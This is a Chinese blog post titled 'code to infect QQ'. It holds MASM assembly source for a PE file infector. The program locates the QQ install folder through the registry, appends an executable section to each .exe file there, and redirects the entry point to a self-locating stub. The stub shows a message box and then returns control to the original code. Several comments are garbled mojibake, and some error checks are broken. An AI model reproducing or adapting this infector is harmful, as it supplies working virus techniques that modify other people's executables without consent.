感染QQ的代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
|
;ml /c /coff Add_Section.asm
;link /subsystem:windows /section:.text,RWE
Add_Section.res Add_Section.obj
.386
.model flat, stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib
include advapi32.inc
includelib advapi32.lib
WndProc proto :DWORD, :DWORD, :DWORD, :DWORD
AddNewSection proto :DWORD
;很有用的宏:
CTEXT MACRO y:VARARG
LOCAL sym
CONST segment
ifidni <y>,<>
sym db 0
else
sym db y,0
endif
CONST ends
exitm <offset sym>
ENDM
.const
MAXSIZE equ 260
Head_Len equ sizeof IMAGE_NT_HEADERS + sizeof
IMAGE_SECTION_HEADER
.data
szRegKey db 'SOFTWARE\TENCENT\QQ',0
szKey db 'Install',0 ;键值名称
szStr1 dd REG_SZ ;数据
FileNamePattern db "*.exe",0
ofn OPENFILENAME <>
FileNameOfQQ db 256 dup(0)
PE_Header IMAGE_NT_HEADERS <0>
My_Section IMAGE_SECTION_HEADER <>
szDllName db "User32", 0
szMessageBoxA db "MessageBoxA", 0
FileName db 256 dup(0)
szFile db 256 dup(0)
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
FillFileInfo proc uses edi
LOCAL finddata:WIN32_FIND_DATA
LOCAL hFindFile:DWORD
invoke FindFirstFile,addr szFile,addr finddata
.if eax!=INVALID_HANDLE_VALUE
mov hFindFile,eax
.repeat
invoke RtlZeroMemory,addr FileNameOfQQ,sizeof
FileNameOfQQ
invoke lstrcat,addr FileNameOfQQ,addr FileName
lea eax,finddata.cFileName
invoke lstrcat,addr FileNameOfQQ,eax
call _AddNewSection
invoke FindNextFile,hFindFile,addr finddata
.until eax == FALSE
invoke FindClose,hFindFile
.endif
ret
FillFileInfo endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_QueryKey proc _lpKey
LOCAL hKey :DWORD
LOCAL BufSize :DWORD
invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr
szRegKey,NULL, KEY_QUERY_VALUE,addr hKey
.if eax == ERROR_SUCCESS
invoke RegQueryValueEx,hKey,addr
szKey,NULL,NULL,addr FileName,addr BufSize
.if eax == ERROR_SUCCESS
invoke lstrcat,addr szFile,addr FileName
invoke lstrcat,addr szFile,addr FileNamePattern
invoke RegCloseKey,hKey
.endif
.endif
ret
_QueryKey endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>
main:
call _QueryKey
call FillFileInfo
invoke ExitProcess,NULL
_AddNewSection proc
LOCAL hFile: HANDLE
LOCAL dwPE_Header_OffSet: DWORD
LOCAL dwFileReadWritten: DWORD
LOCAL dwMySectionOffSet: DWORD
LOCAL dwLastSection_SizeOfRawData: DWORD
LOCAL dwLastSection_PointerToRawData: DWORD
;打开文件:
invoke CreateFile, addr FileNameOfQQ, GENERIC_READ
or GENERIC_WRITE,\
FILE_SHARE_READ or FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,
NULL
.if eax != INVALID_HANDLE_VALUE
mov hFile, eax
;****************************************
;读取PE文件头:
;****************************************
invoke SetFilePointer, hFile, 3ch, 0, FILE_BEGIN
invoke ReadFile, hFile, addr dwPE_Header_OffSet, 4,
addr dwFileReadWritten, NULL
invoke SetFilePointer, hFile, dwPE_Header_OffSet,
0, FILE_BEGIN
invoke ReadFile, hFile, addr PE_Header, Head_Len,
addr dwFileReadWritten, NULL
;****************************************
;å¤ææ¯å¦ææçPEæ件ï¼æ¯çè¯æ继ç»
:
;****************************************
.if [PE_Header.Signature] != IMAGE_NT_SIGNATURE
;å¦æä¸æ¯ææçPEæ件ï¼å°±ç»åºæç¤
:
invoke CloseHandle,hFile
.endif
;****************************************
;判断是否有足够空间存储新节:
;****************************************
movzx eax, [PE_Header.FileHeader.NumberOfSections]
;得到添加新节前有多少个节:
mov ecx, 28h ;28h = sizeof IMAGE_SECTION_HEADER
mul ecx ;eax = NumberOfSections * sizeof
IMAGE_SECTION_HEADER
add eax, dwPE_Header_OffSet ;eax = eax +
PE文件头偏移
add eax, 18h ;18h = sizeof IMAGE_FILE_HEADER
movzx ecx,
[PE_Header.FileHeader.SizeOfOptionalHeader]
add eax, ecx ;eax = eax + sizeof
IMAGE_OPTIONAL_HEADER
add eax, 28h ;添加一个新节的大小
.if eax > [PE_Header.OptionalHeader.SizeOfHeaders]
invoke CloseHandle,hFile
.endif
;****************************************
;保存原入口,后面要用到:
;****************************************
mov eax,
[PE_Header.OptionalHeader.AddressOfEntryPoint]
mov Old_AddressOfEntryPoint, eax
mov eax, [PE_Header.OptionalHeader.ImageBase]
mov Old_ImageBase, eax
;**************************************************
;计算新节的偏移地址:
;ï¼å¶å®è·ä¸é¢çâå¤ææ¯å¦æ足å¤ç©ºé
存储新节”基本上一样)
;**************************************************
movzx eax, [PE_Header.FileHeader.NumberOfSections]
mov ecx, 28h
mul ecx ;eax = NumberOfSections * sizeof
IMAGE_SECTION_HEADER
add eax, 4h ;4h = sizeof "PE\0\0"
add eax, dwPE_Header_OffSet
add eax, sizeof IMAGE_FILE_HEADER
add eax, sizeof IMAGE_OPTIONAL_HEADER
mov dwMySectionOffSet, eax
;现在得到了我们的新节的偏移地址
;****************************************
;填充我们自己的节的信息:
;ï¼è¿é¨å请æ¥çPEæ ¼å¼ï¼å¾å®¹ææç½ï¼
不多说了)
;****************************************
mov dword ptr [My_Section.Name1], "MSA."
;名字就叫做“.LC”吧,呵呵……
mov [My_Section.Misc.VirtualSize], offset vEnd -
offset vStart
push [PE_Header.OptionalHeader.SizeOfImage]
pop [My_Section.VirtualAddress]
mov eax, [My_Section.Misc.VirtualSize]
mov ecx, [PE_Header.OptionalHeader.FileAlignment]
cdq
div ecx
inc eax
mul ecx
mov [My_Section.SizeOfRawData], eax ;SizeOfRawData
å¨EXEæ件ä¸æ¯å¯¹é½å°FileAlignMentçæ´æ°
倍的值
mov eax, dwMySectionOffSet
sub eax, 18h ;è¿ä¸ªå移æ¯å®ä½å°æåä¸è
的“SizeOfRawData”
invoke SetFilePointer, hFile, eax, 0, FILE_BEGIN
invoke ReadFile, hFile, addr
dwLastSection_SizeOfRawData, 4, addr
dwFileReadWritten, NULL
invoke ReadFile, hFile, addr
dwLastSection_PointerToRawData, 4, addr
dwFileReadWritten, NULL
;每个节的 PointerToRawData
等于它的上一节的 SizeOfRawData +
PointerToRawData:
mov eax, dwLastSection_SizeOfRawData
add eax, dwLastSection_PointerToRawData
mov [My_Section.PointerToRawData], eax
mov [My_Section.PointerToRelocations], 0h
mov [My_Section.PointerToLinenumbers], 0h
mov [My_Section.NumberOfRelocations], 0h
mov [My_Section.NumberOfLinenumbers], 0h
mov [My_Section.Characteristics], 0E0000020h
;可读可写可执行
;**************************************************
;éæ°åå¥IMAGE_SECTION_HEADERï¼ï¼åå«äºæ°
节的信息)
;**************************************************
invoke SetFilePointer, hFile, dwMySectionOffSet, 0,
FILE_BEGIN
invoke WriteFile, hFile, addr My_Section, sizeof
IMAGE_SECTION_HEADER, addr dwFileReadWritten,
NULL
;****************************************
;得到 MessageBoxA 的线性地址:
;****************************************
invoke GetModuleHandle, addr szDllName
invoke LoadLibrary, addr szDllName
invoke GetProcAddress, eax, addr szMessageBoxA
mov MessageBoxA_Addr, eax
;****************************************
;在文件的最后写入我们的新节:
;****************************************
invoke SetFilePointer, hFile, 0, 0, FILE_END
push 0
lea eax, dwFileReadWritten
push eax
push [My_Section.SizeOfRawData]
lea eax, vStart
push eax
push hFile
call WriteFile
;**************************************************
;æ¹åIMAGE_NT_HEADERSï¼ä½¿æ°èå¯ä»¥é¦åæ§è
:
;(需要改写 SizeOfImage 和
AddressOfEntryPoint)
;**************************************************
inc [PE_Header.FileHeader.NumberOfSections]
mov eax, [My_Section.Misc.VirtualSize]
mov ecx,
[PE_Header.OptionalHeader.SectionAlignment]
cdq
div ecx
inc eax
mul ecx
add eax, [PE_Header.OptionalHeader.SizeOfImage]
mov [PE_Header.OptionalHeader.SizeOfImage], eax
;SizeOfImageæ¯ä¸ä¸ªå¯¹é½å°SectionAlignmentç
整数倍的值
mov eax, [My_Section.VirtualAddress]
mov [PE_Header.OptionalHeader.AddressOfEntryPoint],
eax ;现在的 AddressOfEntryPoint
是指向新节的第一条指令
invoke SetFilePointer, hFile, dwPE_Header_OffSet,
0, FILE_BEGIN
invoke WriteFile, hFile, addr PE_Header, sizeof
IMAGE_NT_HEADERS, addr dwFileReadWritten, NULL
;****************************************
;完成!显示成功信息:
;****************************************
invoke CloseHandle,hFile
.endif
Err_CreateFile_Exit:
ret
_AddNewSection endp
;****************************************
;åµåµï¼æ们èªå·±çä¸ä¸ï¼ï¼åä¸åçæ¯ï¼
)
;****************************************
vStart:
call nStart
nStart:
pop ebp
sub ebp, offset nStart
;得到新节在文件中的实际偏移地址
;显示对话框:
push MB_OK or MB_ICONINFORMATION
lea eax, szMyCaption[ebp]
push eax
lea eax, szMyMsg[ebp]
push eax
push 0
call MessageBoxA_Addr[ebp]
;æ¢å¤åå¥å£å°åãå½è¿ä¸ªèæ§è¡å®æ¯å
ï¼å°±åå°äºåæ¥çæ件å¥å£å¤ç»§ç»æ§
行:
mov eax, Old_ImageBase[ebp]
add eax, Old_AddressOfEntryPoint[ebp]
push eax
ret
;变量定义:
MessageBoxA_Addr dd 0
szMyMsg db
"我是asm,你能看到我吗?", 13, 10, 13,
10,\
"by asm",13, 10, "htt
p://www.asm32.cn",0
szMyCaption db "test", 0
Old_ImageBase dd 0
Old_AddressOfEntryPoint dd 0
vEnd:
end main
|
Trackback(0)
|
美国 : 
Unknown Browser
TrackBack URI for this entry
Subscribe to this comment's feed
Show/Hide comments
Show/Hide comment form